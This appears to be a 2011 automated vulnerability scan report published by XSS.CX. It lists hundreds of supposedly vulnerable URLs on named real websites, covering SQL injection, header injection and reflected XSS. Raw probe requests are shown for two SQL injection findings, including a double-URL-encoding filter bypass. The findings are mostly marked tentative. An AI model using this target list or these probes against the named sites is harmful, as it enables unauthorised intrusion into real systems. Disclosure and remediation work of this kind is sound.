Google DORK, GHDB, Fools, Inept, No experience Necessary

Reflected XSS, Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Vulnerable Hosts, Fools

Report generated by XSS.CX at Fri Apr 22 23:36:39 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 3]

1.2. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [id cookie]

1.3. http://www.skymall.com/shopping/cart.htm [hiddenlong parameter]

1.4. http://www.skymall.com/shopping/cart.htm [pid parameter]

1.5. http://www.skymall.com/shopping/cart.htm [sbs parameter]

1.6. http://www.skymall.com/shopping/dept.htm [CoreID6 cookie]

1.7. http://www.skymall.com/shopping/dept.htm [TXNSESSION cookie]

1.8. http://www.skymall.com/shopping/dept.htm [User-Agent HTTP header]

1.9. http://www.skymall.com/shopping/dept.htm [__utmb cookie]

1.10. http://www.skymall.com/shopping/dept.htm [__utmc cookie]

1.11. http://www.skymall.com/shopping/dept.htm [__utmz cookie]

1.12. http://www.skymall.com/shopping/dept.htm [cmRS cookie]

1.13. http://www.skymall.com/shopping/dept.htm [source cookie]

1.14. http://www.skymall.com/shopping/detail.htm [__utmc cookie]

1.15. http://www.skymall.com/shopping/subdept.htm [90043274_clogin cookie]

1.16. http://www.skymall.com/shopping/subdept.htm [Referer HTTP header]

1.17. http://www.skymall.com/shopping/subdept.htm [partner cookie]

2. HTTP header injection

2.1. http://ad.doubleclick.net/ad/x1.aud/salesforce/customcloud/lp [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.9 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/wn.loc.kwtv/business [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/wn.loc.kwtv/education [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adj/wn.loc.kwtv/foodrecipe [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/wn.loc.kwtv/health [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/wn.loc.kwtv/homepage [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/wn.loc.kwtv/news [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio01 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio07 [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-environmental [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-worldnow22 [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/wn.loc.kwtv/station15 [REST URL parameter 1]

2.15. http://ad.doubleclick.net/adj/wn.loc.kwtv/station5 [REST URL parameter 1]

2.16. http://ad.doubleclick.net/adj/wn.loc.kwtv/station9 [REST URL parameter 1]

2.17. http://ad.doubleclick.net/adj/wn.nat.kwtv/news [REST URL parameter 1]

2.18. http://ad.doubleclick.net/adj/wn.nat.kwtv/radio07 [REST URL parameter 1]

2.19. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 1]

2.20. http://ad.doubleclick.net/adj/wn.nat.kwtv/station2 [REST URL parameter 1]

2.21. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [REST URL parameter 1]

2.22. http://www.salesforce.com/common/assets/css/styles.css [REST URL parameter 4]

2.23. http://www.salesforce.com/common/assets/css/superfish.css [REST URL parameter 4]

2.24. http://www.salesforce.com/common/assets/js/global2.js [REST URL parameter 4]

2.25. http://www.salesforce.com/common/assets/js/opinionlab/oo_engine.js [REST URL parameter 5]

2.26. http://www.salesforce.com/common/assets/js/sf.js [REST URL parameter 4]

2.27. http://www.salesforce.com/common/assets/js/supersubs.js [REST URL parameter 4]

2.28. http://www.salesforce.com/common/assets/thirdparty/foresee/foresee-surveydef.js [REST URL parameter 5]

2.29. http://www.salesforce.com/common/assets/thirdparty/foresee/transport5.swf [REST URL parameter 5]

2.30. http://www.salesforce.com/common/assets/thirdparty/omniture/s_code3.js [REST URL parameter 5]

2.31. http://www.salesforce.com/common/assets/thirdparty/pixels/pixel-manager.js [REST URL parameter 5]

2.32. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

2.33. http://www.salesforce.com/platform [REST URL parameter 1]

2.34. http://www.salesforce.com/platform/210x147_rotatingbanner.swf [REST URL parameter 2]

2.35. http://www.salesforce.com/platform/data/banner_rotation.xml [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [sz parameter]

3.2. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

3.3. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 1]

3.4. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 2]

3.5. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 3]

3.6. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 4]

3.7. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 5]

3.8. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 6]

3.9. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 7]

3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]

3.11. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

3.12. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]

3.13. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 1]

3.14. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 2]

3.15. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 3]

3.16. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 4]

3.17. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 5]

3.18. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 6]

3.19. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [REST URL parameter 7]

3.20. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [name of an arbitrarily supplied request parameter]

3.21. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

3.22. http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH [target parameter]

3.23. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.24. http://jobs.ctg.eu/N [REST URL parameter 1]

3.25. http://jobs.ctg.eu/jobs/ [REST URL parameter 1]

3.26. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 1]

3.27. http://jobs.ctg.eu/misc/drupal.js [REST URL parameter 2]

3.28. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 1]

3.29. http://jobs.ctg.eu/misc/jquery.js [REST URL parameter 2]

3.30. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 1]

3.31. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 2]

3.32. http://jobs.ctg.eu/modules/node/node.css [REST URL parameter 3]

3.33. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 1]

3.34. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 2]

3.35. http://jobs.ctg.eu/modules/system/defaults.css [REST URL parameter 3]

3.36. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 1]

3.37. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 2]

3.38. http://jobs.ctg.eu/modules/system/system-menus.css [REST URL parameter 3]

3.39. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 1]

3.40. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 2]

3.41. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 3]

3.42. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 1]

3.43. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 2]

3.44. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 3]

3.45. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 1]

3.46. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 2]

3.47. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 3]

3.48. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 4]

3.49. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

3.50. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]

3.51. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]

3.52. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]

3.53. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 3]

3.54. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 4]

3.55. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 5]

3.56. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

3.57. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

3.58. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]

3.59. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]

3.60. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]

3.61. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]

3.62. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]

3.63. http://jobs.ctg.eu/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

3.64. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 1]

3.65. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 2]

3.66. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 3]

3.67. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

3.68. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 5]

3.69. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

3.70. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]

3.71. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 3]

3.72. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 4]

3.73. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 5]

3.74. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 1]

3.75. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 2]

3.76. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 3]

3.77. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 4]

3.78. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 5]

3.79. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 6]

3.80. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 1]

3.81. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 2]

3.82. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 3]

3.83. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 4]

3.84. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 5]

3.85. http://jobs.ctg.eu/sites/all/modules/views/js/base.js [REST URL parameter 6]

3.86. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 1]

3.87. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 2]

3.88. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 3]

3.89. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 4]

3.90. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 5]

3.91. http://jobs.ctg.eu/sites/all/modules/views/js/dependent.js [REST URL parameter 6]

3.92. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 1]

3.93. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 2]

3.94. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

3.95. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 3]

3.96. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

3.97. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 4]

3.98. http://jobs.ctg.eu/sites/all/modules/views_accordion/views-accordion.js [REST URL parameter 5]

3.99. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 1]

3.100. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 2]

3.101. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 3]

3.102. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 4]

3.103. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 5]

3.104. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 6]

3.105. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 1]

3.106. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 2]

3.107. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 3]

3.108. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 4]

3.109. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 5]

3.110. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 6]

3.111. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 1]

3.112. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 2]

3.113. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 3]

3.114. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 4]

3.115. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 5]

3.116. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 6]

3.117. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 1]

3.118. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 2]

3.119. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 3]

3.120. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 4]

3.121. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 5]

3.122. http://jobs.ctg.eu/sites/all/themes/threesixty/css/structure.css [REST URL parameter 6]

3.123. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 1]

3.124. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 2]

3.125. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 3]

3.126. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 4]

3.127. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 5]

3.128. http://jobs.ctg.eu/sites/all/themes/threesixty/js/AC_RunActiveContent.js [REST URL parameter 6]

3.129. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 1]

3.130. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 2]

3.131. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 3]

3.132. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

3.133. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

3.134. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 5]

3.135. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 6]

3.136. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 1]

3.137. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 2]

3.138. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 3]

3.139. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

3.140. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

3.141. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

3.142. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

3.143. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 6]

3.144. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 1]

3.145. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 2]

3.146. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 3]

3.147. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 4]

3.148. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 5]

3.149. http://jobs.ctg.eu/sites/all/themes/threesixty/js/jquery.filestyle.mini.js [REST URL parameter 6]

3.150. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 1]

3.151. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 2]

3.152. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 3]

3.153. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 4]

3.154. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 5]

3.155. http://jobs.ctg.eu/sites/all/themes/threesixty/js/swfobject.js [REST URL parameter 6]

3.156. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 1]

3.157. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 2]

3.158. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 3]

3.159. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 4]

3.160. http://jobs.ctg.eu/sites/default/files/blogger/Michael_0.jpg [REST URL parameter 5]

3.161. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 1]

3.162. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 2]

3.163. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 3]

3.164. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 4]

3.165. http://jobs.ctg.eu/sites/default/files/blogger/Wendy_0.jpg [REST URL parameter 5]

3.166. http://jobs.ctg.eu/we-promise [REST URL parameter 1]

3.167. http://js.revsci.net/gateway/gw.js [csid parameter]

3.168. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 1]

3.169. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 3]

3.170. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 7]

3.171. https://secure.ubi.com/register/CreateAccount.aspx [NextURL parameter]

3.172. http://widgets.digg.com/buttons/count [url parameter]

3.173. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

3.174. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 1]

3.175. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 3]

3.176. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 1]

3.177. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 3]

3.178. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 8]

3.179. https://www.salsalabs.com/dia/hq/css/custom.css [REST URL parameter 1]

3.180. https://www.salsalabs.com/dia/hq/sso/ [REST URL parameter 1]

3.181. https://www.salsalabs.com/favicon.ico [REST URL parameter 1]

3.182. http://www.skymall.com/shopping/dept.htm [c parameter]

3.183. http://www.skymall.com/shopping/subdept.htm [c parameter]

3.184. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]

3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.186. http://www.ubi.com/resources/scripts/sifr_init_js.aspx [path parameter]

3.187. http://www.ubi.com/resources/ubi_stylesheet_png.aspx [path parameter]

3.188. http://www.blacksingles.com/favicon.ico [Referer HTTP header]

3.189. http://www.palomar.edu/favicon.ico [Referer HTTP header]

3.190. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]

3.191. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

3.192. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]

3.193. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

3.194. https://www.salsalabs.com/favicon.ico [Referer HTTP header]

3.195. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

3.196. http://www.wiredforchange.com/favicon.ico [Referer HTTP header]

3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.199. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

3.200. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]

3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]

3.202. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]



1. SQL injection  next
There are 17 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/sales-environmental

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/wn.nat.kwtv/sales-environmental';sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 22 Apr 2011 16:06:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4618

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...
<a href=\"/global/Story.asp?s=14491037\" updatelink=\"true\" trackclick=\"dfp\" style=\"color:#000000; font-size: 10px; \">Amazon failure crashes web </a>
...[SNIP]...

Request 2

GET /adj/wn.nat.kwtv/sales-environmental'';sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 22 Apr 2011 16:06:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4580

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/weather

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the id cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y%2527

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:45 GMT
Expires: Fri, 22 Apr 2011 15:51:45 GMT
Cache-Control: private
Content-Length: 4618

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235258_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...
<a href=\"/global/Story.asp?s=14491037\" updatelink=\"true\" trackclick=\"dfp\" style=\"color:#000000; font-size: 10px; \">Amazon failure crashes web </a>
